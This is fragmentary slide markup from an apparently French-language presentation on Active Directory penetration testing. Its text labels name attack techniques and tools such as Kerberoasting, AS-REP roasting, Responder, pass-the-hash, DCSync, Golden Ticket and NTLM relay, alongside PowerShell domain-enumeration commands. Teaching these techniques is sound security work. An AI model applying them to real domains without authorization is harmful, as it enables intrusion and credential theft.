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73" r:id="rId7"/>
    <p:sldId id="271" r:id="rId8"/>
    <p:sldId id="272" r:id="rId9"/>
    <p:sldId id="262" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="264" r:id="rId12"/>
    <p:sldId id="265" r:id="rId13"/>
    <p:sldId id="286" r:id="rId14"/>
    <p:sldId id="287" r:id="rId15"/>
    <p:sldId id="266" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="268" r:id="rId18"/>
    <p:sldId id="269" r:id="rId19"/>
    <p:sldId id="270" r:id="rId20"/>
    <p:sldId id="274" r:id="rId21"/>
    <p:sldId id="276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B2B"/>
    <a:srgbClr val="76CABB"/>
    <a:srgbClr val="2A6C5F"/>
    <a:srgbClr val="353333"/>
    <a:srgbClr val="605C5C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3" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr>
        <p:scale>
          <a:sx n="66" d="100"/>
          <a:sy n="66" d="100"/>
        </p:scale>
        <p:origin x="4182" y="20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5B75-24D7-CA91-0147-246EFDA88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5614FF-2954-0F51-4F7D-EEC10E06F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789999-75DD-A81C-49FA-FE5A48D9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C3A2A0-952B-1C6F-A876-5EFA37BE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56D85E-975D-6934-0422-9029C11D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72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756689-AA6F-C1BA-4BA6-72283983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7A8B7E-EEBD-7259-1943-942571D6C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EE5A60-34CD-7956-D1E2-E887EAA3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51ABFD-3591-DFBF-AB5C-987D39B3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A633D6-1C54-56FE-E8B7-F5EF93D0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30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CE599C5-B5FD-4712-6A89-F55DDFF12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09A02C-E357-440F-D732-8187A717C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C9A259-F395-8239-0726-F3D61A17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135E6A-6822-0A43-0A0E-4331D432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5958B-4386-EA57-CFBC-3FE9691D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16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FFC1DB-60E5-FCC3-0819-EDED1ADB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90B8FC-B191-3E0E-3F75-350A6235E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268AD5-1895-80EA-52FF-9CDB8852D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33EDE5-EC58-9747-E7B3-A6E9A8C55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FAEBD3-9F04-210A-0177-01B5EEDC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66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F06DB-544B-E290-56B7-118BC1A9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BDFCA6-D620-447B-869C-7AF2ED666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DA05C9-6EEC-8003-7D14-E475B281B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42CF31-64F0-7592-41A5-6CEB87EE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C59E82-BE28-217E-5115-F8CFCF0F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72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EC786B-800C-971C-246F-32849E72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A681C1-B553-149C-B46E-0AC58C343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71FB09-490D-37B0-0A8B-66A4279F2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2EE8D4-796B-D8E8-7C9F-38E10F9C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CD8957-12E7-1DC4-5C7A-6DDA15AF2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A193A6-5F7D-A1E5-D093-32E3BCAC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40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7684DD-2403-C1EA-16B7-40FFE390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1E9302-80C8-BF8A-BE36-3948FEE24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14AD59-322C-E5CA-75B6-EBD24D253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816765-0502-A3F6-DE4E-3B473C9E4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421242A-5570-8C7C-106F-5C8FE2EAF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5C5DB9-2358-58A7-C15C-58F9EBA7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97E47E0-68DB-88BA-2737-1B775F88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E99C68A-275A-7218-DF4A-63C906B2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13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8B72C-41BC-EF2C-EF8B-57C62AA3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905B88-AB5D-62F3-78E6-C78D0F97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CAC4C8-3D55-A768-67C4-8C5A8259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DA3739-889F-1EF5-C9BF-DB446275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47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26FB445-F8C6-1050-7261-FAB53B10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6DAADA-EBD2-A282-0C27-8F55492F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23349D-C218-2604-1CF4-8A75F0F1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27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DE69E-2F7C-5010-0968-8836DF2E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477D1C-BA1B-8EDE-57A5-08C9CBC08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D593A2-2CC6-34F1-4F4E-2E4B91A8F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9B4635-F77C-7B4C-442A-1AE6409F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1247AB-BBE9-1DAE-AECA-BC5E80FF5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AADB15-E101-23DC-FE1A-0D1996ED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5809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248F7A-F67C-B5B8-3613-ABCC6E83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30CD694-EAF9-AAC2-F584-E276687B7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F541E0-22E4-15C9-180B-23F037F3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9332BF-75A7-C54C-970E-6C2BFFC1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CC5074-DB36-24F8-1A1C-C1CCAE70E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534151-DBD8-ECBB-4867-7C9AC5F15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85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E40C42E-B8C2-B65D-4A9C-4C98393D6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A579DB-C84A-72B9-879A-7B7D276CA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6A4021-D2F6-5BBB-3507-3E37160E5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AFC63-637B-49AC-A711-2721298BEBD4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1C9DC2-83ED-9A3D-C069-3F07A9EBD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AB3516-6EDB-002D-274A-9896B9002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C1745-3B24-4740-AA89-DE9A5B3A8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02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25.jpg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId9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6.jp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25.jpg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image24.jp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0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4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image20.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image39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9.gif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9.gif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9.gif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9.gif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-3791584" y="320813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3792823" y="3206474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691890" y="-2136438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7006205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2757785" y="320813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69" y="-1661845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60619" y="696206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43400" y="7092043"/>
            <a:ext cx="1327005" cy="130012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A4D1959A-A395-3332-EEEA-B3E0B0440819}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1562100" y="1155700"/>
            <a:ext cx="9067800" cy="4546600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1328F0DF-95F0-DA09-DDB8-CBA275F086B1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8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128F5949-B165-8A9F-3EF5-4AFFA9555AC7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29" name="Sous-titre 2">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34682F5A-66BA-04E4-7377-8EA715663773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28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28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6886BC4-7949-255C-94BF-1B2E1BCC4B24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13060619" y="538619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A2741ED2-C1B5-98C3-47D6-4BD00501CE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445" y="5629554"/>
            <a:ext cx="1750457" cy="985090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7484690-6F4F-65DA-6CB3-E54C5B4C1098}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6747510" y="7006205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09516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691890" y="7523097"/>
            <a:ext cx="4808220" cy="2670832"/>
            <a:chOff x="487680" y="251389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89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2" y="1086388"/>
              <a:ext cx="3715567" cy="3116171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5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154775" y="-2866887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3956684" y="3371648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811731" y="-2661384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10726815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4504372" y="1116658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2776835" y="5224855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303170" y="10671559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422" y="5416349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10" y="-2186791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4658" y="1460077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50415" y="10671559"/>
            <a:ext cx="1327005" cy="13001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44F109B-97AD-3FD0-5DA2-C78E3D18E3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775" y="7145705"/>
            <a:ext cx="3174560" cy="444360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C528878-7A6A-D241-D147-5884FF2D4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7160629"/>
            <a:ext cx="3174559" cy="443223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0923741-813A-39C5-6002-FDA8F0FDC6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81458" y="1460077"/>
            <a:ext cx="3900590" cy="539183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7C559AF-A290-8ABB-BAAF-0600A51EC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932003" y="2267977"/>
            <a:ext cx="3198732" cy="44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6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691890" y="7523097"/>
            <a:ext cx="4808220" cy="2670832"/>
            <a:chOff x="487680" y="251389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89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2" y="1086388"/>
              <a:ext cx="3715567" cy="3116171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5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154775" y="-2866887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3956684" y="3371648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811731" y="-2661384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10726815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4504372" y="1116658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2776835" y="5224855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422" y="5416349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10" y="-2186791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4658" y="1460077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50415" y="10671559"/>
            <a:ext cx="1327005" cy="13001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44F109B-97AD-3FD0-5DA2-C78E3D18E3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640" y="259488"/>
            <a:ext cx="3174560" cy="444360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702A31-B2B7-067D-4370-60101C33D1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761" y="265170"/>
            <a:ext cx="3174559" cy="44322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88A3571-06A5-8A4E-58ED-6F2DCD8292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0530" y="2085946"/>
            <a:ext cx="3170349" cy="438241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1D082D5-C000-93EB-C712-CFF75CCECD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0257" y="2024005"/>
            <a:ext cx="3198732" cy="4428680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03EE059-9783-EB86-79F4-CBE3B2F8355D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6252036" y="10671559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05046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691890" y="2093584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158116" y="320813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158116" y="3206474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15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691890" y="320813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4948315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8681085" y="320813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8681085" y="4948315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204586" y="4948316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72" y="5139809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69" y="795406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3919" y="696206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43400" y="5034153"/>
            <a:ext cx="1327005" cy="13001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6BDDD16-4D2C-9758-3DE8-0EF636A99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368064" y="174582"/>
            <a:ext cx="3174560" cy="444360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F85A5C0-35E2-7D14-3E57-9547CD81B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98447" y="1939099"/>
            <a:ext cx="3198732" cy="442868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4CFE308-B897-1F33-62AA-F2B766FF06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45464" y="-71388"/>
            <a:ext cx="3174559" cy="443223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9457864-A27C-D40C-6A55-DE09A77860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0002" y="-3216739"/>
            <a:ext cx="3170349" cy="4382413"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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DB6DAA0-8AED-AFD0-AF8E-75E2FD8F78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582" y="-3194881"/>
            <a:ext cx="3643818" cy="2593489"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15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A63F0F9-E271-0704-A9BB-F58290868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422331" y="3227189"/>
            <a:ext cx="2647950" cy="2695575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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9FEA477-0F27-FF6E-D59E-DD7035E1CA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1625" y="-3664954"/>
            <a:ext cx="3708266" cy="2945891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17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3134C8FA-51E3-928F-0377-D9493DC513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99081" y="4433070"/>
            <a:ext cx="509651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1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501390" y="-6342052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291465" y="-3400287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8957084" y="3754095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4103309" y="-3262354"/>
            <a:ext cx="4880610" cy="1773975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4893945" y="2518067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3386435" y="18680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8752205" y="7996315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13689269" y="4992125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63" y="8214048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38" y="-2637782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89269" y="394073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5545455" y="2603905"/>
            <a:ext cx="1327005" cy="13001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6BDDD16-4D2C-9758-3DE8-0EF636A99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368064" y="174582"/>
            <a:ext cx="3174560" cy="444360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F85A5C0-35E2-7D14-3E57-9547CD81B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98447" y="1939099"/>
            <a:ext cx="3198732" cy="4428680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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636C408-79E5-0A08-F088-0743F0113E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117" y="350624"/>
            <a:ext cx="3643818" cy="2593489"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15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9F65123-523B-65DB-0D78-6D62CCE30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335" y="3188829"/>
            <a:ext cx="2647950" cy="2695575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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A175DFC-ACDB-6B4C-2A4F-8D7A4B2B31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9065" y="394073"/>
            <a:ext cx="3708266" cy="2945891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17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574A9533-D1BE-F92C-E478-A1D11E8CE0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3381" y="4207602"/>
            <a:ext cx="5096510" cy="1743075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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B6CC90D-4428-C9A5-436B-CCF42CDD50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631197" y="0"/>
            <a:ext cx="4348945" cy="2218096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3C36DFF-A80A-BD73-3A3A-16B81F5DFAAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5621539" y="4207602"/>
            <a:ext cx="5490210" cy="113347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en-US" sz="11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Get-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ADDomain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| select Forest,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DNSRoot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`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Get-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ADDomainController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| Select Forest, Domain, IPV4Address,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IsGlobalCatalog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IsReadOnly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OperatingSystem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`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 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7" name="Image 26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DC35910E-ABEB-1C44-F230-778077B7B76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398" y="4214851"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28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D9CE9B76-FF9C-43B4-6A9C-3E1A48FAB1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8227" y="7335280"/>
            <a:ext cx="5760720" cy="1322070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2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D3237EE-8A4C-E251-8CBD-966813CC81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23423" y="270385"/>
            <a:ext cx="3812019" cy="2753965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30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52E5873B-4ECB-31E4-1515-37FB5D8703C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1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7757094" y="7335280"/>
            <a:ext cx="4166603" cy="1449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4650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501390" y="-6342052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291465" y="-3400287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8957084" y="3754095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15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4103309" y="-3262354"/>
            <a:ext cx="4880610" cy="1773975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4893945" y="2518067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3386435" y="18680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8752205" y="7996315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13689269" y="4992125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63" y="8214048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38" y="-2637782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89269" y="394073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5545455" y="2603905"/>
            <a:ext cx="1327005" cy="13001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6BDDD16-4D2C-9758-3DE8-0EF636A99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368064" y="174582"/>
            <a:ext cx="3174560" cy="444360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F85A5C0-35E2-7D14-3E57-9547CD81B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98447" y="1939099"/>
            <a:ext cx="3198732" cy="4428680"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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636C408-79E5-0A08-F088-0743F0113E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500662" y="18680"/>
            <a:ext cx="3643818" cy="2593489"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15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9F65123-523B-65DB-0D78-6D62CCE30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555934" y="3032451"/>
            <a:ext cx="2647950" cy="2695575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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A175DFC-ACDB-6B4C-2A4F-8D7A4B2B31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86435" y="394073"/>
            <a:ext cx="3708266" cy="2945891"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17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574A9533-D1BE-F92C-E478-A1D11E8CE0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0821" y="7217310"/>
            <a:ext cx="5096510" cy="1743075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1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E1CFF60-9D58-A592-D452-2123389225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057" y="394074"/>
            <a:ext cx="4348945" cy="2218096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6BC2F4F3-550F-89AC-054B-B6B8B1F15072}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415290" y="4169789"/>
            <a:ext cx="5490210" cy="113347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en-US" sz="11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Get-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ADDomain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| select Forest,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DNSRoot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`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Get-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ADDomainController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| Select Forest, Domain, IPV4Address,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IsGlobalCatalog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IsReadOnly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OperatingSystem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`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 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5" name="Image 24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56438B80-07E0-8591-AA65-243BEBDAFAA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31" y="4177038"/>
            <a:ext cx="641350" cy="203200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26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DC8CCE06-7C21-952C-FF09-421E31BE7C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0292" y="5355394"/>
            <a:ext cx="5760720" cy="1322070"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27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C41A90D-AB1E-46E2-D093-4E0D7E8DCF3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11678" y="278486"/>
            <a:ext cx="3812019" cy="2753965"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28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2949FC09-EC0E-29F4-7B1C-D97AD1BAA5C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1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7757094" y="3428657"/>
            <a:ext cx="4166603" cy="1449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0752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-5669082" y="4187168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0" y="-3975416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4395787" y="1713689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15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800475" y="-3495894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3052862" y="22269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3089056" y="4911284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314" y="5129017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4" y="-3021301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502" y="583739"/>
            <a:ext cx="2794756" cy="2794756"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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CB642043-348D-1920-F051-B652C65EEAA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8681085" y="7430258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Kerberoasting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4A054C1-80AA-D671-D877-9D856612131A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8681084" y="8932487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C912512-6D9C-F30D-448E-FCE8250963F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8681084" y="10484988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58E09A8-E16E-9D7B-DF45-3182538B529C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8681083" y="12037489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avec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D956B6-3547-FA83-816B-F32BE59158C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1516952" y="940830"/>
            <a:ext cx="276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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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2617223-311F-7AAF-FE57-FDFFE815023E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8703913" y="5261597"/>
            <a:ext cx="276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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Responder</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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3B8D85A-1075-9F7E-1B8B-AD35860BD5D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="445099" y="1848723"/>
            <a:ext cx="276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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Hashcat</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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F9C665D-1B18-E298-F525-1876443BCC8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10139811" y="4613814"/>
            <a:ext cx="276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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Asreproast</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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583802D-07F9-A503-EDB0-FFA2A7654298}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8314501" y="3262871"/>
            <a:ext cx="276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chemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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60B28AE-49FB-A859-64EC-2612A9B9E52D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9075817" y="2216149"/>
            <a:ext cx="276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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Adrecon</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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8DFA501-7621-FD5D-5374-A7E09A9C3483}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1502351" y="5038698"/>
            <a:ext cx="276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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Bloodhound</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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17EE1DF-A14B-BEA3-A5D3-1664865B5E3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627429" y="4296968"/>
            <a:ext cx="276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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Crackmap</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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DFB5252-80F7-7B36-7AFC-7C80AE23746A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8632855" y="4406678"/>
            <a:ext cx="138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itchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SMB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0F7296D-583F-A01B-2C45-45D29547BD0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="319321" y="2919157"/>
            <a:ext cx="2761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bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Pingcastle</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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F169139-E8DC-F844-0F36-65770AFA8399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2032574" y="2150800"/>
            <a:ext cx="276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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Powerview</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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A3A0F0D-D60E-7E59-7050-413F2E855EE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3287694" y="957576"/>
            <a:ext cx="276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itchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>PTH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92BAD96-E454-F02F-B392-A3619E9540A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10327274" y="1533849"/>
            <a:ext cx="276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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>DCSync</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR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A0B7AA-5DDB-0905-201D-69CA544DB9B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7913267" y="940830"/>
            <a:ext cx="276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itchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>MSSQL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1989F81-D040-BB73-DF79-44938E2552B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4812438" y="5474943"/>
            <a:ext cx="276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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Golden Ticket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D42211A-B1CC-95A2-1A8A-AB534847BAAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4877503" y="940830"/>
            <a:ext cx="2761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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>NTLM Relay SMB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192D0AF-4E9E-6AF1-AD2E-5DA670D2C6B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1735291" y="3396786"/>
            <a:ext cx="2761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Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>NTLM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Montserrat" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>RelayADCS</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="20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5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/>
      <p:bldP spid="22" grpId="0"/>
      <p:bldP spid="23" grpId="0"/>
      <p:bldP spid="25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-5669082" y="4187168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0" y="-3975416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942975" y="1804008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800475" y="-3495894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732865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3052862" y="22269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3089056" y="4911284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349365" y="7328658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314" y="5129017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4" y="-3021301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502" y="583739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43400" y="7414496"/>
            <a:ext cx="1327005" cy="130012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D71569-8C8D-8177-6A9E-1A06C6DF3C09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-5741472" y="-141569"/>
            <a:ext cx="4880610" cy="3895664"/>
            <a:chOff x="303727" y="2188765"/>
            <a:chExt cx="4880610" cy="389566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ED144A4-CC9C-037D-AF7E-E6A1230CA025}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="303727" y="2188765"/>
              <a:ext cx="4880610" cy="3895664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4657E09-A143-4397-1619-02DE37B4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893" y="2474588"/>
              <a:ext cx="4268278" cy="3152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16000" endPos="11000" dir="5400000" sy="-100000" algn="bl" rotWithShape="0"/>
            </a:effectLst>
          </p:spPr>
        </p:pic>
      </p:grp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503A44E-A5C6-E710-4BF2-78D3B3784EB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6970594" y="458946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Kerberoasting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B5B5D60-8BB2-8F51-7151-6BBE6FD93986}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8681083" y="7995832"/>
            <a:ext cx="4297481" cy="200634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 SMB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96EC070-AB98-1333-AA38-E2FE77448B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8681084" y="10484988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5CF8B22-ED29-BE95-DA54-C3B125F0CE12}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
